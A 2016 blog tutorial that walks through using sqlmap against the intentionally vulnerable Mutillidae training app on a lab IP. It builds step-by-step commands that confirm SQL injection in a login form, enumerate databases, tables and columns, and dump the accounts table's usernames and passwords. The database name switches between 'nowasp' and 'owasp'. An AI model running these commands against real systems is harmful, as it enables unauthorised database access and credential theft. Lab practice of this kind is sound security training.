Wednesday, 13 January 2016

SQLMAP - Database takeover tool - the old skool way

Hacking mysql database via SQLMAP

here I will demonstrate a sql injection attack using SQLMAP, I will use this hack to bypass a login

Tools:SQLMAP/Burpsuite
Browser:Iceweasel
Web App:Mutillidae v2.6.30
OS:Kali Linux

First;
  • configure browser and proxy (I'm using burpsuite) then head to 
  •  http://192.168.0.9/mutillidae/index.php?page=login.php 
  • enter some data in the username & password fields
  • In burp review the data from the post capture we need some info for it


so using the capture above we can now begin constructing our sqlmap command.

sqlmap --url="ENTER_FULL_URL_HERE" (this is a combination of the host and post field as shown above)

sqlmap --url="http://192.168.0.9/mutillidae/index.php?page=login.php"

next part of the command
--data="ENTER_DATA_HERE" (this is actually the body of the post request)

--data="username=admin&password=admcdicndsjcn&login-php-submit-button=Login"

 and finally 
--banner (retrieves database banner)

 the sqlmap command is now complete. our full sqlmap command is;

sqlmap --url="http://192.168.0.9/mutillidae/index.php?page=login.php" --data="username=username&password=password&login-php-submit-button=Login" --banner 

(a truncated video displaying the outcome of the injection)(**banner**) 


BYPASSING A LOGIN USING SQLMAP 


 so we are 100% certain that the mysql database is vulnerable to sql injection, now we will escalate our attack and see what credentials we can grab

So now as we know we need to bypass the loggin presented to us on the login page, we know now that the application vulnerable to sql injection so we will mount an attack to verify this. We already have the main command for the attack already

sqlmap --url="http://192.168.0.9/mutillidae/index.php?page=login.php" --data="username=username&password=password&login-php-submit-button=Login"  

we simply need to append the command slightly, first new command/switch/paramemter we enter is 

--dbs (this tells us the available databases)

there  was 6 options 

form experience I know that the database we need to attack is named nowasp, now we can further ammend our sqlmap command to ;

 remove --dbs (as we now know the name of the databse that we need to hack)
add
-D owasp 
and add
--tables (the tables switch will list all tables within the database owasp)

 again experience tells me i want to retrieve the info held within the accounts table
we can now further ammend our command
remove
--tables
add
-T accounts
add
--Columns (gives us a list of columns to select info from  
bingo we know have a full list of all the columns of info we want to retrieve, in this case i want
firstname
lastname
password
username
we are now ready to complete our sqlmap command and hack so we
remove
--columns 
and add
-C firstname,lastname,password,username
we need to --dump all credentials retrieved so we can see them so we us the --dump command, our full sqlmap injection command is

sqlmap --url="http://192.168.0.9/mutillidae/index.php?page=login.php" --data="username=username&password=password&login-php-submit-button=Login" -D nowasp -T accounts -C firstname,lastname,password,username --dump

we have successfully retrieved all usernames & passwords for the login to the system thereby bypassing any need for us to need our own login.



 


Posted by at
Labels: , , ,